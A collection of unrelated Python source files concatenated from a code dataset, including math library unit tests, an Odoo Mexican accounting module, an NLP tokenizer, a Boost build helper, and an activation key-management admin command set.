self.assertEqual(yammpy.copysign(1., 0.), 1.)
self.assertEqual(yammpy.copysign(1., -0.), -1.)
self.assertEqual(yammpy.copysign(INF, 0.), INF)
self.assertEqual(yammpy.copysign(INF, -0.), NINF)
self.assertEqual(yammpy.copysign(NINF, 0.), INF)
self.assertEqual(yammpy.copysign(NINF, -0.), NINF)
def testFdim(self):
self.assertEqual(yammpy.fdim(4, 1), 3)
self.assertEqual(yammpy.fdim(4, -1), 5)
self.assertEqual(yammpy.fdim(8, 1), 7)
self.assertEqual(yammpy.fdim(10, -10), 20)
def testHypot(self):
self.assertEqual(yammpy.hypot(12.0, 5.0), 13.0)
self.assertEqual(yammpy.hypot(12, 5), 13)
self.assertEqual(yammpy.hypot(0, INF), INF)
self.assertEqual(yammpy.hypot(10, INF), INF)
self.assertEqual(yammpy.hypot(-10, INF), INF)
self.assertEqual(yammpy.hypot(-INF, INF), INF)
self.assertEqual(yammpy.hypot(-INF, -INF), INF)
self.assertEqual(yammpy.hypot(10, -INF), INF)
def testPow(self):
self.assertEqual(yammpy.pow(0,1), 0)
self.assertEqual(yammpy.pow(1,0), 1)
self.assertEqual(yammpy.pow(2,1), 2)
self.assertEqual(yammpy.pow(2,-1), 0.5)
self.assertEqual(yammpy.pow(INF, 1), INF)
self.assertEqual(yammpy.pow(NINF, 1), NINF)
self.assertEqual((yammpy.pow(1, INF)), 1.)
self.assertEqual((yammpy.pow(1, NINF)), 1.)
def testFmod(self):
self.assertEqual(yammpy.fmod(10, 1), 0.0)
self.assertEqual(yammpy.fmod(10, 0.5), 0.0)
self.assertEqual(yammpy.fmod(10, 1.5), 1.0)
self.assertEqual(yammpy.fmod(-10, 1), -0.0)
self.assertEqual(yammpy.fmod(-10, 0.5), -0.0)
self.assertEqual(yammpy.fmod(-10, 1.5), -1.0)
self.assertTrue(yammpy.isnan(yammpy.fmod(NAN, 1.)))
self.assertTrue(yammpy.isnan(yammpy.fmod(1., NAN)))
self.assertTrue(yammpy.isnan(yammpy.fmod(NAN, NAN)))
self.assertEqual(yammpy.fmod(3.0, INF), 3.0)
self.assertEqual(yammpy.fmod(-3.0, INF), -3.0)
self.assertEqual(yammpy.fmod(3.0, NINF), 3.0)
self.assertEqual(yammpy.fmod(-3.0, NINF), -3.0)
self.assertEqual(yammpy.fmod(0.0, 3.0), 0.0)
self.assertEqual(yammpy.fmod(0.0, NINF), 0.0)
def testRemainder(self):
self.assertEqual(yammpy.remainder(+5.1, +3.0), -0.9000000000000004)
self.assertEqual(yammpy.remainder(-5.1, +3.0), 0.9000000000000004)
self.assertEqual(yammpy.remainder(+5.1, -3.0), -0.9000000000000004)
self.assertEqual(yammpy.remainder(-5.1, -3.0), 0.9000000000000004)
self.assertEqual(yammpy.remainder(+0.0, 1.0), 0.0)
self.assertEqual(yammpy.remainder(-0.0, 1.0), -0.0)
self.assertEqual(yammpy.remainder(+5.1, INF), 5.1)
def testSqrt(self):
self.assertEqual(yammpy.sqrt(0), 0)
self.assertEqual(yammpy.sqrt(1), 1)
self.assertEqual(yammpy.sqrt(4), 2)
self.assertEqual(yammpy.sqrt(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.sqrt(NAN)))
def testDegrees(self):
self.assertEqual(yammpy.degrees(yammpy.pi), 180.0)
self.assertEqual(yammpy.degrees(yammpy.pi/2), 90.0)
self.assertEqual(yammpy.degrees(-yammpy.pi/4), -45.0)
self.assertEqual(yammpy.degrees(0), 0)
def testRadians(self):
self.assertEqual(yammpy.radians(180), yammpy.pi)
self.assertEqual(yammpy.radians(90), yammpy.pi/2)
self.assertEqual(yammpy.radians(-45), -yammpy.pi/4)
self.assertEqual(yammpy.radians(0), 0)
def testSum(self):
self.assertEqual(yammpy.sum([]), 0)
self.assertEqual(yammpy.sum([1, 2, 3, 4, 5]), 15)
self.assertEqual(yammpy.sum([1.0, 2.0, 3.0, 4.0, 5.0]), 15.0)
self.assertEqual(yammpy.sum([1, 2, 3, 4.0, 5.0]), 15.0)
self.assertEqual(yammpy.sum([1.0, 2.0, 3.0, 4, 5]), 15.0)
def testProd(self):
self.assertEqual(yammpy.prod([]), 1)
self.assertEqual(yammpy.prod([1, 2, 3, 4, 5]), 120)
self.assertEqual(yammpy.prod([1.0, 2.0, 3.0, 4.0, 5.0]), 120.0)
self.assertEqual(yammpy.prod([1, 2, 3, 4.0, 5.0]), 120.0)
self.assertEqual(yammpy.prod([1.0, 2.0, 3.0, 4, 5]), 120.0)
def testIsfinite(self):
self.assertTrue(yammpy.isfinite(0.0))
self.assertTrue(yammpy.isfinite(-0.0))
self.assertTrue(yammpy.isfinite(1.0))
self.assertTrue(yammpy.isfinite(-1.0))
self.assertFalse(yammpy.isfinite(float("nan")))
self.assertFalse(yammpy.isfinite(float("inf")))
self.assertFalse(yammpy.isfinite(float("-inf")))
def testIsinf(self):
self.assertTrue(yammpy.isinf(float("inf")))
self.assertTrue(yammpy.isinf(float("-inf")))
self.assertTrue(yammpy.isinf(1E400))
self.assertTrue(yammpy.isinf(-1E400))
self.assertFalse(yammpy.isinf(float("nan")))
self.assertFalse(yammpy.isinf(0.))
self.assertFalse(yammpy.isinf(1.))
def testIsnan(self):
self.assertTrue(yammpy.isnan(float("nan")))
self.assertTrue(yammpy.isnan(float("-nan")))
self.assertTrue(yammpy.isnan(float("inf") * 0.))
self.assertFalse(yammpy.isnan(float("inf")))
self.assertFalse(yammpy.isnan(0.))
self.assertFalse(yammpy.isnan(1.))
def testIsperfsqr(self):
self.assertTrue(yammpy.isperfsqr(4))
self.assertTrue(yammpy.isperfsqr(209764))
self.assertTrue(yammpy.isperfsqr(616225))
self.assertFalse(yammpy.isperfsqr(5))
self.assertFalse(yammpy.isperfsqr(209765))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
43902 | # coding: utf-8
# Copyright 2016 Vauxoo (https://www.vauxoo.com) <<EMAIL>>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import re
from odoo import models, api, fields, _
class AccountJournal(models.Model):
_inherit = 'account.journal'
@api.model
def _prepare_liquidity_account(self, name, company, currency_id, type):
'''
When preparing the values to use when creating the default debit and credit accounts of a
liquidity journal, set the correct tags for the mexican localization.
'''
res = super(AccountJournal, self)._prepare_liquidity_account(name, company, currency_id, type)
if company.country_id.id == self.env.ref('base.mx').id:
mx_tags = self.env['account.account'].mx_search_tags(res.get('code', ''))
if mx_tags:
res.update({
'tag_ids': [(6, 0, [tag.id for tag in mx_tags])]
})
return res
class AccountAccount(models.Model):
_inherit = 'account.account'
@api.model
def mx_search_tags(self, code):
account_tag = self.env['account.account.tag']
#search if the code is compliant with the regexp we have for tags auto-assignation
re_res = re.search(
'^(?P<first>[1-8][0-9][0-9])[,.]'
'(?P<second>[0-9][0-9])[,.]'
'(?P<third>[0-9]{2,3})$', code)
if not re_res:
return account_tag
#get the elements of that code divided with separation declared in the regexp
account = re_res.groups()
return account_tag.search([
('name', '=like', "%s.%s%%" % (account[0], account[1])),
('color', '=', 4)], limit=1)
@api.onchange('code')
def _onchange_code(self):
if self.company_id.country_id.id == self.env.ref('base.mx').id and self.code:
tags = self.mx_search_tags(self.code)
self.tag_ids = tags
class AccountAccountTag(models.Model):
_inherit = 'account.account.tag'
nature = fields.Selection([
('D', 'Debitable Account'), ('A', 'Creditable Account')],
help='Used in Mexican report of electronic accounting (account nature).')
| StarcoderdataPython |
144492 | """This module is used for preprocessing user inputs before further analysis.
The user utterance is broken into tokens which contain additional information
about the it.
"""
from typing import Text, List, Optional
import string
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
class Token:
"""Subpart of an utterance. Contains mapping of start and end positions in
the original utterance. In addition it stores the lemmatized version of
the token and whether it is a stopword or not.
"""
def __init__(self,
text: Text,
start: int,
end: Optional[int] = None,
lemma: Optional[Text] = None,
is_stopword: Optional[bool] = False) -> None:
self.text = text
self.start = start
self.end = end if end else start + len(text)
self.lemma = lemma if lemma else text
self.is_stopword = is_stopword
def overlaps(self, other) -> bool:
"""Checks whether two tokens overlap in the original utterance.
Args:
other (Token): Token to compare against
Returns:
bool: True if there is overlap.
"""
return (self.start < other.start
and self.end >= other.start) or (other.start < self.start
and other.end >= self.start)
def __lt__(self, other):
return (self.start, self.end) < (other.start, other.end)
def __add__(self, other):
sorted_tokens = sorted((self, other))
text = ' '.join(token.text for token in sorted_tokens)
lemma = ' '.join(token.lemma for token in sorted_tokens)
return Token(text, sorted_tokens[0].start, sorted_tokens[1].end, lemma)
def __radd__(self, other):
if other == 0:
return self
else:
return self.__add__(other)
class TextProcess:
"""This class contains methods needed for preprocessing sentences.
"""
def __init__(self, additional_stop_words: List[Text] = None) -> None:
stop_words = stopwords.words('english')
if additional_stop_words:
stop_words.extend(additional_stop_words)
self._stop_words = set(stop_words)
self._lemmatizer = WordNetLemmatizer()
self._punctuation = set(string.punctuation.replace('\'', ''))
def process_text(self, text: Text) -> List[Token]:
"""Processes given text. The text is split into tokens which can be
mapped back to the original text.
Args:
text (Text): Input text, user utterance.
Returns:
List[Token]: List of Tokens
"""
processed_text = self.remove_punctuation(text)
word_tokens = processed_text.split() #word_tokenize(processed_text)
return self.tokenize(word_tokens, text)
def remove_punctuation(self, text: Text) -> Text:
"""Defines patterns of punctuation marks to remove in the
utterance.
Args:
text (str): Sentence.
Returns:
str: Sentence without punctuation.
"""
return ''.join(
ch if ch not in self._punctuation else ' ' for ch in text)
def lemmatize_text(self, text: Text) -> Text:
"""Returns string lemma.
Args:
text (Text): Input text.
Returns:
Text: Lemmatized string.
"""
text = text.replace('\'', '')
return self._lemmatizer.lemmatize(text.lower())
def tokenize(self, word_tokens: List[Text], text: Text) -> List[Token]:
"""Returns a tokenized copy of text.
Args:
text (str): Sentence to tokenize.
Returns:
List[str]: List of tokens.
"""
end = 0
tokens = []
for word in word_tokens:
start = text.index(word, end)
end = start + len(word)
lemma = self.lemmatize_text(word)
is_stopword = word in self._stop_words
tokens.append(Token(word, start, end, lemma, is_stopword))
return tokens
| StarcoderdataPython |
1662228 | <reponame>DevinTDHa/spark-nlp-workshop
import json
import os
with open('license.json') as f:
license_keys = json.load(f)
# Defining license key-value pairs as local variables
locals().update(license_keys)
# Adding license key-value pairs to environment variables
os.environ.update(license_keys)
from pyspark.ml import Pipeline,PipelineModel
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from sparknlp.annotator import *
from sparknlp_jsl.annotator import *
from sparknlp.base import *
import sparknlp_jsl
import sparknlp
import warnings
warnings.filterwarnings('ignore')
params = {"spark.driver.memory":"16G",
"spark.kryoserializer.buffer.max":"2000M",
"spark.driver.maxResultSize":"2000M"}
print ("Spark NLP Version :", sparknlp.version())
print ("Spark NLP_JSL Version :", sparknlp_jsl.version())
spark = sparknlp_jsl.start(SECRET,params=params)
from sparknlp.pretrained import PretrainedPipeline
ner_pipeline = PretrainedPipeline("ner_model_finder", "en", "clinical/models")
result = ner_pipeline.annotate("medication")
print(100*'-')
print(result)
print(100*'-') | StarcoderdataPython |
3378767 | def fatorial(num: int) -> int:
"""
num E Naturais ( Números *Inteiros* e *positivos* )
:param num: int
:return: int
"""
if num <= 1:
return 1
return num*(fatorial(num-1))
print(fatorial(5)) | StarcoderdataPython |
1742886 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
********************************
reslib.data.merges
********************************
This module contains code to merge common datasets (e.g. add permnos to gvkeys, etc.)
:copyright: (c) 2019 by <NAME>.
:license: MIT, see LICENSE for more details.
""" | StarcoderdataPython |
1747574 |
# Copyright <NAME> 2011-2017
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#-------------------------------------------------------------------------------
# Boost Library Methods
#-------------------------------------------------------------------------------
# SCons Imports
from SCons.Script import AlwaysBuild, Flatten
# Cuppa Imports
from cuppa.colourise import colour_items
from cuppa.log import logger
# Boost Imports
from cuppa.dependencies.boost.boost_builder import BoostLibraryBuilder
class BoostStaticLibraryMethod(object):
def __init__( self, add_dependents=False, build_always=False, verbose_build=False, verbose_config=False ):
self._add_dependents = add_dependents
self._build_always = build_always
self._verbose_build = verbose_build
self._verbose_config = verbose_config
def __call__( self, env, libraries ):
if not self._add_dependents:
logger.warn( "BoostStaticLibrary() is deprecated, use BoostStaticLibs() or BoostStaticLib() instead" )
libraries = Flatten( [ libraries ] )
if not 'boost' in env['BUILD_WITH']:
env.BuildWith( 'boost' )
Boost = env['dependencies']['boost']( env )
logger.trace( "Build static libraries [{}]".format( colour_items( libraries ) ) )
library = BoostLibraryBuilder(
Boost,
add_dependents = self._add_dependents,
verbose_build = self._verbose_build,
verbose_config = self._verbose_config )( env, None, None, libraries, 'static' )
if self._build_always:
return AlwaysBuild( library )
else:
return library
class BoostSharedLibraryMethod(object):
def __init__( self, add_dependents=False, build_always=False, verbose_build=False, verbose_config=False ):
self._add_dependents = add_dependents
self._build_always = build_always
self._verbose_build = verbose_build
self._verbose_config = verbose_config
def __call__( self, env, libraries ):
if not self._add_dependents:
logger.warn( "BoostSharedLibrary() is deprecated, use BoostSharedLibs() or BoostSharedLib() instead" )
libraries = Flatten( [ libraries ] )
if not 'boost' in env['BUILD_WITH']:
env.BuildWith( 'boost' )
Boost = env['dependencies']['boost']( env )
for library in libraries:
if library.startswith('log'):
env.AppendUnique( CPPDEFINES = 'BOOST_LOG_DYN_LINK' )
elif library == 'chrono':
env.AppendUnique( CPPDEFINES = 'BOOST_CHRONO_DYN_LINK' )
elif library == 'filesystem':
env.AppendUnique( CPPDEFINES = 'BOOST_FILESYSTEM_DYN_LINK' )
elif library == 'date_time':
env.AppendUnique( CPPDEFINES = 'BOOST_DATE_TIME_DYN_LINK' )
elif library == 'regex':
env.AppendUnique( CPPDEFINES = 'BOOST_REGEX_DYN_LINK' )
elif library == 'system':
env.AppendUnique( CPPDEFINES = 'BOOST_SYSTEM_DYN_LINK' )
library = BoostLibraryBuilder(
Boost,
add_dependents = self._add_dependents,
verbose_build = self._verbose_build,
verbose_config = self._verbose_config )( env, None, None, libraries, 'shared' )
if self._build_always:
return AlwaysBuild( library )
else:
return library
| StarcoderdataPython |
1638099 | # -*- coding: utf-8 -*-
from bio2bel import get_data_dir
MODULE_NAME = 'nextprot'
DATA_DIR = get_data_dir(MODULE_NAME)
# This file is a list of terms; one per line
ACCESSIONS_URL = 'ftp://ftp.nextprot.org/pub/current_release/ac_lists/nextprot_ac_list_all.txt'
# CV files each have their own specification described at their top
CV_FAMILY_URL = 'ftp://ftp.nextprot.org/pub/current_release/controlled_vocabularies/cv_family.txt'
CV_DOMAIN_URL = 'ftp://ftp.nextprot.org/pub/current_release/controlled_vocabularies/cv_domain.txt'
# Mapping files have a first column with NX accession numbers, then a second with the mapping accession
ENTREZ_MAPPING_URL = 'ftp://ftp.nextprot.org/pub/current_release/mapping/nextprot_geneid.txt'
HGNC_MAPPING_URL = 'ftp://ftp.nextprot.org/pub/current_release/mapping/nextprot_hgnc.txt'
| StarcoderdataPython |
1765306 | <filename>adminacttools/actadmcmds/actadmcmds.py<gh_stars>0
#
# Copyright (C) 2010-2012 Opersys inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Commands for activation.
import sys, os, readline, acttools
import ConfigParser
# kpython
from kfile import *
from kreadline import Command
def dump_KAP(kap):
l1 = ["Key ID: %s" % (str(kap.key_id) if not kap.key_id is None else "no"),
"KDN: %s" % (kap.kdn if not kap.kdn is None else "no")]
l2 = ["Pub. Sig. Key: %s" % ("yes" if not kap.email_sig_pkey is None else "no"),
"Priv. Sig. Key: %s" % ("yes" if not kap.email_sig_skey is None else "no"),
"Pub. Enc. Key: %s" % ("yes" if not kap.email_enc_pkey is None else "no")]
l3 = ["Bundle: %s" % ("yes" if not kap.bundle is None else "no"),
"License: %s" % ("yes" if not kap.license is None else "no")]
return [", ".join(l1), ", ".join(l2), ", ".join(l3)]
class LsActivatorCommand(Command):
Name = "lsactivator"
Syntax = ""
Help = "List the activators."
MaxParams = 0
MinParams = 0
def run(self, intr):
acts = acttools.list_activators(intr.basedir)
for act in acts:
sys.stdout.write("%s\n" % act.name)
is_invalid = False
sys.stdout.write("\tIdentity: ")
if act.identity:
sys.stdout.write(act.identity.id_name + "\n")
else:
is_invalid = True
sys.stdout.write("None or unknown.\n")
if act.parent_identity:
sys.stdout.write("\tParent identity: " + act.parent_identity.id_name + "\n")
sys.stdout.write("\tKey set: ")
if act.keyset:
sys.stdout.write(act.keyset.keys_name + "\n")
else:
is_invalid = True
sys.stdout.write("None.\n")
if act.step:
sys.stdout.write("\tStep number: %d\n" % act.step)
if is_invalid:
sys.stdout.write("\t*** This activator is invalid.\n")
if act.identity and act.keyset:
kaps = act.list_KAP()
for k in kaps:
(kn, kap, _) = k
sys.stdout.write("\tKAP: %s\n" % kn)
lines = dump_KAP(kap)
for l in lines:
sys.stdout.write("\t\t%s\n" % l)
return 0
class LsKeysCommand(Command):
Name = "lskeys"
Syntax = ""
Help = "List the key sets."
MaxParams = 0
MinParams = 0
def run(self, intr):
def has_pair(k, n):
skey = n + "_skey"
pkey = n + "_pkey"
has_skey = hasattr(k, skey) and not getattr(k, skey) is None
has_pkey = hasattr(k, pkey) and not getattr(k, pkey) is None
if has_skey and has_pkey:
return "OK"
elif not has_skey and not has_pkey:
return "Missing"
elif (has_skey and not has_pkey) or (not has_skey and has_pkey):
return "Incomplete!"
keysets = acttools.list_keys(intr.basedir)
for k in keysets:
sys.stdout.write("%s\n" % k.keys_name)
sys.stdout.write("\tPre-activation keys: ")
sys.stdout.write(has_pair(k, 'enc_zero') + "\n")
sys.stdout.write("\tEncryption keys: ")
sys.stdout.write(has_pair(k, 'enc') + "\n")
sys.stdout.write("\tSignature keys: ")
sys.stdout.write(has_pair(k, 'sig') + "\n")
return 0
class LsIdentityCommand(Command):
Name = "lsidentity"
Syntax = ""
Help = "List the identities on the disk."
MaxParams = 0
MinParams = 0
def run(self, intr):
identities = acttools.list_identity(intr.basedir)
for ident in identities:
sys.stdout.write("%s\n" % ident.id_name)
z = (ident.country,
ident.state,
ident.location,
ident.org,
ident.org_unit,
ident.domain,
ident.email)
sys.stdout.write("\t C: %s\n\t ST:%s\n\t L: %s\n\t O: %s\n\t OU:%s\n\t CN:%s\n\t @: %s\n" % z)
z = (ident.admin_name, ident.admin_email)
sys.stdout.write("\tAdmin: %s <%s>\n" % z)
sys.stdout.write("\tKDN: %s\n" % (ident.kdn if not ident.kdn is None else "None"))
if ident.asserted:
sys.stdout.write("\t*** This identity has been asserted.\n")
else:
sys.stdout.write("\tThis identity has not been asserted.\n")
return 0
class NewIdentityCommand(Command):
Name = "newidentity"
Syntax = "<identity name> [<identity .ini>]"
Help = "Create a new identity for activation."
MaxParams = 2
MinParams = 1
def run(self, intr, id_name, identity_ini = None):
if acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s already exists.\n" % id_name)
return 1
else:
if identity_ini:
if identity_ini != "@stdin" and not os.path.exists(identity_ini):
sys.stderr.write("File %s doesn't exists." % identity_ini)
return 1
cfg = ConfigParser.ConfigParser()
if identity_ini == "@stdin":
cfg.readfp(sys.stdin)
else:
cfg.readfp(open(identity_ini, "r"))
# Check if we have everything we need.
for s in ["country", "state", "location", "org",
"org_unit", "domain", "name", "email"]:
if not cfg.has_option("identity", s):
sys.stdout.write("Missing %s in .ini file.\n" % s)
return 1
ident = acttools.Identity(intr.basedir, id_name)
ident.country = cfg.get("identity", "country")
ident.state = cfg.get("identity", "state")
ident.location = cfg.get("identity", "location")
ident.org = cfg.get("identity", "org")
ident.org_unit = cfg.get("identity", "org_unit")
ident.domain = cfg.get("identity", "domain")
ident.name = cfg.get("identity", "name")
ident.email = cfg.get("identity", "email")
ident.admin_name = cfg.get("identity", "name")
ident.admin_email = cfg.get("identity", "email")
ident.save()
else:
# Manually enter everything.
ident = acttools.Identity(intr.basedir, id_name)
ident.country = intr.simple_input("Country? ".rjust(15))
ident.state = intr.simple_input("State? ".rjust(15))
ident.location = intr.simple_input("Location? ".rjust(15))
ident.org = intr.simple_input("Org.? ".rjust(15))
ident.org_unit = intr.simple_input("Org. unit? ".rjust(15))
ident.email = intr.simple_input("Email? ".rjust(15))
ident.domain = intr.simple_input("Domain? ".rjust(15))
ident.admin_name = intr.simple_input("Admin. name? ".rjust(15))
ident.admin_email = intr.simple_input("Admin. email? ".rjust(15))
ident.save()
return 0
class NewActivatorCommand(Command):
Name = "newactivator"
Syntax = "<activator name> [<identity name>] [<keyset name>]"
Help = "Create a new activation."
MaxParams = 3
MinParams = 1
def run(self, intr, act_name, id_name = None, keys_name = None):
if acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s already exists.\n" % act_name)
return 1
if id_name and not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
return 1
if keys_name and not acttools.KeySet.exists(intr.basedir, keys_name):
sys.stderr.write("Key set name %s doesn't exists.\n" % keys_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
if id_name:
ident = acttools.Identity(intr.basedir, id_name)
act.identity = ident
if keys_name:
keys = acttools.KeySet(intr.basedir, keys_name)
act.keyset = keys
act.save()
return 0
class ShowCSRCommand(Command):
Name = "showcsr"
Syntax = "<identity name>"
Help = "Display the CSR to be used to assert the identity."
MaxParams = 1
MinParams = 1
def run(self, intr, id_name):
if not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n")
return 1
else:
ident = acttools.Identity(intr.basedir, id_name)
sys.stdout.write(ident.get_CSR())
return 0
class ShowCertCommand(Command):
Name = "showcert"
Syntax = "<identity name>"
Help = "Display the certificate used to assert the identity."
MaxParams = 1
MinParams = 1
def run(self, intr, id_name):
if not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
return 1
else:
ident = acttools.Identity(intr.basedir, id_name)
sys.stdout.write(ident.get_cert())
return 0
class SetCertCommand(Command):
Name = "setcert"
Syntax = "<identity name> <file name>"
Help = "Set the certificate that asserts the identity."
MaxParams = 2
MinParams = 2
def run(self, intr, id_name, cert_file):
if cert_file != "@stdin" and not os.path.exists(cert_file):
sys.stderr.write("File %s doesn't exists.\n" % cert_file)
return 1
else:
if cert_file == "@stdin":
cert_data = sys.stdin.read()
else:
cert_data = read_file(cert_file)
if not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
return 1
else:
ident = acttools.Identity(intr.basedir, id_name)
ident.set_cert(cert_data)
return 0
if not ident.asserted:
sys.stderr.write("This certificate doesn't assert this identity.\n")
return 1
class SetParentIdentityCommand(Command):
Name = "setparentidentity"
Syntax = "<activator name> <identity name>"
Help = "Set the parent identity to be used for signing a KAR."
MaxParams = 2
MinParams = 1
def run(self, intr, act_name, parent_id_name = None):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
if parent_id_name and not acttools.Identity.exists(intr.basedir, parent_id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % parent_id_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
if parent_id_name:
ident = acttools.Identity(intr.basedir, parent_id_name)
act.parent_identity = ident
else:
act.parent_identity = None
act.save()
return 0
class SetIdentityCommand(Command):
Name = "setidentity"
Syntax = "<activator name> <identity name>"
Help = "Set the identity to be used for the activator."
MaxParams = 2
MinParams = 1
def run(self, intr, act_name, id_name = None):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
if id_name and not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
if id_name:
ident = acttools.Identity(intr.basedir, id_name)
act.identity = ident
else:
act.identity = None
act.save()
return 0
class SetKeysCommand(Command):
Name = "setkeys"
Syntax = "<activator name> <key set name>"
Help = "Set the key set to be used for the activator."
MaxParams = 2
MinParams = 1
def run(self, intr, act_name, keys_name = None):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
if keys_name and not acttools.KeySet.exists(intr.basedir, keys_name):
sys.stderr.write("Key set name %s doesn't exists.\n" % keys_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
if keys_name:
keys = acttools.KeySet(intr.basedir, keys_name)
act.keyset = keys
else:
act.keyset = None
act.save()
return 0
class RmIdentityCommand(Command):
Name = "rmidentity"
Syntax = "<identity name>"
Help = "Delete an existing identity."
MaxParams = 1
MinParams = 1
def run(self, intr, id_name):
if not acttools.Identity.exists(intr.basedir, id_name):
sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
return 1
else:
acttools.Identity(intr.basedir, id_name).delete()
return 0
class RmKeysCommand(Command):
Name = "rmkeys"
Syntax = "<key set name>"
Help = "Delete a set of keys."
MaxParams = 1
MinParams = 1
def run(self, intr, keys_name):
if not acttools.KeySet.exists(intr.basedir, keys_name):
sys.stderr.write("Key set %s doesn't exists.\n" % keys_name)
return 1
else:
acttools.KeySet(intr.basedir, keys_name).delete()
return 0
class RmActivatorCommand(Command):
Name = "rmactivator"
Syntax = "<activator name>"
Help = "Remove an activator."
MaxParams = 1
MinParams = 1
def run(self, intr, act_name):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
act.delete()
return 0
class NewKeysCommand(Command):
Name = "newkeys"
Syntax = "<keys name> [<initial encryption pkey> <initial encryption skey>|@stdin]"
Help = "Create new keys for a particular identity."
MaxParams = 3
MinParams = 1
def run(self, intr, keys_name, zero_enc_pkey = None, zero_enc_skey = None):
if acttools.KeySet.exists(intr.basedir, keys_name):
sys.stdout.write("Key set %s already exists.\n" % keys_name)
return 1
else:
zero_enc_pkey_data = zero_enc_skey_data = None
if zero_enc_pkey == "@stdin":
# This is kind of a hack to support ractivate.
(zero_enc_pkey_data, zero_enc_skey_data) = sys.stdin.read().split("@")
acttools.KeySet(intr.basedir, keys_name,
zero_pkey_data = zero_enc_pkey_data,
zero_skey_data = zero_enc_skey_data)
else:
acttools.KeySet(intr.basedir, keys_name,
zero_pkey_file = zero_enc_pkey,
zero_skey_file = zero_enc_skey)
return 0
class GenKARCommand(Command):
Name = "genkar"
Syntax = "<activator name> <kar output file>"
Help = "Prepare a new KAR from the activator."
MaxParams = 2
MinParams = 2
def run(self, intr, act_name, output_file):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
product_name = "unknown"
product_version = "unknown"
if os.path.exists("/etc/teambox/product_name"):
product_name = read_file("/etc/teambox/product_name")
if os.path.exists("/etc/teambox/product_version"):
product_version = read_file("/etc/teambox/product_version")
act = acttools.Activator(intr.basedir, act_name)
if output_file == "@stdout":
sys.stdout.write(act.get_KAR(product_name, product_version))
else:
write_file(output_file, act.get_KAR(product_name, product_version))
return 0
class OpenKAPCommand(Command):
Name = "openkap"
Syntax = "<activator name> <kap file> [applykap]"
Help = "Open a KAP file."
MaxParams = 3
MinParams = 2
def run(self, intr, act_name, kap_file, applykap = None):
if kap_file != "@stdin" and not os.path.exists(kap_file):
sys.stderr.write("KAP file %s doesn't exists." % kap_file)
return 1
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
if applykap and applykap != "applykap":
sys.stderr.write("Invalid third argument. Must be applykap.")
return 1
act = acttools.Activator(intr.basedir, act_name)
if kap_file != "@stdin":
kap_id = act.add_KAP(read_file(kap_file))
else:
kap_id = act.add_KAP(sys.stdin.read())
if applykap:
r = intr.run_command(["applykap", act.name, kap_id])
if r != 0: return r
return 0
class LsKAPCommand(Command):
Name = "lskap"
Syntax = "<activator name>"
Help = "List the KAP registered to an activator."
MaxParams = 1
MinParams = 1
def run(self, intr, act_name):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
act = acttools.Activator(intr.basedir, act_name)
kaps = act.list_KAP()
if len(kaps) == 0: return 0
for k in kaps:
(kn, kap, _) = k
sys.stdout.write("%s\n" % kn)
lines = dump_KAP(kap)
for l in lines:
sys.stdout.write("\t%s\n" % l)
return 0
class ApplyKAPCommand(Command):
Name = "applykap"
Syntax = "<activator name> <kap name> [test]"
Help = "Apply actions inside the KAP."
MaxParams = 3
MinParams = 2
def run(self, intr, act_name, kap_name, test = None):
if not acttools.Activator.exists(intr.basedir, act_name):
sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
return 1
do_apply = True
if test == "test":
do_apply = False
act = acttools.Activator(intr.basedir, act_name)
act.apply_KAP(kap_name, do_apply)
return 0
| StarcoderdataPython |
134479 | import pytest
from uint import Uint
def test_positive_overflow():
u = Uint(0b11111111, 8)
u += 1
assert u.raw == 0b00000000
def test_negative_overflow():
u = Uint(0b00000000, 8)
u -= 1
assert u.raw == 0b11111111
def test_logical_shift():
u = Uint(0b10100101, 8)
u <<= 1
assert u.raw == 0b01001010
u >>= 2
assert u.raw == 0b00010010
def test_fmt_literal():
u = Uint(0xDEADBEEF, 32)
assert u.literal.bin == f'{0xDEADBEEF:#34b}'
